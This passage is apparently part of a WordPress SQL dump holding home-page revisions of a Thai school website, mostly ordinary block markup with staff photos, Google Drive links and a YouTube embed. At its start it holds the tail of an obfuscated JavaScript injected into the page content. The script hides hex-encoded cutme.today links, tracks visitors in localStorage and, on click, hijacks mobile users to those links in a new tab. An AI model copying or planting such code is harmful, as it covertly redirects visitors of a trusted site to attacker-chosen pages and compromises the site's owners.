70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:39:24','2025-06-27 08:39:24','',19,'http://watprato.ssk.in.th/?p=584',0,'revision','',0),
(585,1,'2025-06-27 15:40:01','2025-06-27 08:40:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8cd9a2-b3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8cd9a2-b3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"> รางวัล\"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_ed3ec7-1c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_ed3ec7-1c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รางวัล\"ด้านผลงานวิชาการที่เป็นเลิศ\"<img class=\"wp-image-538\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- 